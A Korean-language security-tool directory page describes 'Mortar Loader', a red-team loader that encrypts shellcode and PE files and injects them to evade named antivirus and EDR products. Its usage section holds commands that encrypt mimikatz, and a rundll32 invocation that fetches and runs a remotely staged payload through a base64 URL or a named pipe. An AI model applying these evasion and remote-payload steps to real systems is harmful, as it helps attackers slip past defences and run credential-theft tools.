Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
mortar — 회피 기술로, 보안 제품(AV/EDR/XDR)의 탐지 및 차단을 무력화하고 우회합니다. | Kitploit
도구/GitHubGitHub/0xsp-srd/mortar
Exploit FrameworksPayload GenerationIDS/IPS EvasionShellcodeRed Teaming
GitHub0xsp-srd/mortar

mortar

회피 기술로, 보안 제품(AV/EDR/XDR)의 탐지 및 차단을 무력화하고 우회합니다.

저장소 보기
1.5k238202년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Mortar Loader

레드 팀 은폐 기술로 보안 제품의 탐지 및 차단을 우회하고 회피합니다. Mortar Loader는 메모리 스트림 내에서 PE/쉘코드의 암호화 및 복호화를 수행하고 여러 인젝션 기술을 활용하여 실행합니다.
Mortar는 최신 안티바이러스 제품과 고급 XDR 솔루션을 우회할 수 있으며, 다음 제품들에 대해 테스트 및 우회가 확인되었습니다:

  • Kaspersky ✔️
  • ESET AV / EDR ✔️
  • Malewarebytes ✔️
  • Mcafee ✔️
  • Windows defender ✔️
  • Cylance ✔️
  • TrendMicro ✔️
  • Bitdefender ✔️
  • Norton Symantec ✔️
  • Sophos EDR ✔️

업데이트된 기능

최신 버전(v3)에는 다음과 같은 기능이 포함되어 출시되었습니다:

  • 파일리스 실행: 원격 스테이징된 암호화된 바이너리 또는 쉘코드.
  • 얼리 버드 APC 인젝션.
  • 프로세스 위장.
  • Named Pipes 지원.
  • 문자열 및 함수 호출 난독화.
  • Mortar 은밀한 재로드 서브루틴.
  • 지연 실행 기술.

자세한 기술 설명은 다음 블로그 포스트를 참조하십시오: https://kpmg.com/nl/en/home/insights/2023/12/mortar-loader.html

사용법

암호화기

암호화기는 C 쉘코드와 PE 바이너리를 암호화하여 .enc 파일로 출력합니다. x64 아키텍처이고 RAW 형식이 아닌 모든 페이로드(MSF/Cobalt/Havoc 등)를 사용할 수 있습니다.

root@kali>./encryptor -f mimikatz.exe -o bin.enc 
root@kali>./encryptor -f shellcode.c -o bin.enc 

Mortar Loader 라이브러리

최신 릴리스는 원격 페이로드 페칭과 결합된 여러 기술을 활용합니다. 더 많은 통찰력을 얻으려면 다음 블로그 포스트를 참조하는 것이 좋습니다.

간단한 사용 지침

# PE Forking

1. host your encrypted binary on remote host. 
2. encode the final URL with base64. 
3. rundll32.exe agressor.dll,viewlogs [BASE64 URL].
4. covert reload subroutine technique is enabled. 

현재 Named Pipes와 결합된 얼리 버드 인젝션을 지원하여 최종 실행을 위한 변수를 수신합니다.

1. Mortar DLL을 원격 프로세스에 인젝션합니다(DLL 인젝션, 하이재킹, 사이드로딩).
2. Named Pipe에 연결하여 URL을 제공합니다.
   echo {BASE64 URL} > \\.\pipe\moj_ML_ntsvcs 
3. 유효한 값이 수신되면 페이로드가 실행됩니다. 

컴파일

이 프로젝트는 FPC(Free Pascal)로 코딩되었으며, 컴파일 절차는 Lazarus IDE를 다운로드하여 설치하면 간단합니다(https://www.lazarus-ide.org/index.php?page=downloads).

암호화기는 릴리스 섹션에서 다운로드하거나 Lazarus IDE로 쉽게 컴파일할 수 있습니다.

#Debian & Ubuntu 

apt install fpc 
apt install lazarus-ide 

관련 자료

  • v1 릴리스 : https://0xsp.com/security%20research%20&%20development%20(SRD)/defeat-the-castle-bypass-av-advanced-xdr-solutions
  • Mortar Loader v2 기능 : https://0xsp.com/offensive/mortar-loader-v2/
  • CrestCon Asia 2021 발표 : https://www.youtube.com/watch?v=H7EMBz7GLMk

후원?

Mortar 또는 모든 공유 프로젝트의 개발은 개인 시간을 투자한 결과입니다.

  • 제 작업에 대한 지속적인 감사를 표시하십시오.
  • 프리릴리스에 조기 접근할 수 있습니다.
  • 질문을 하면 답변해 드립니다.
도구 다운로드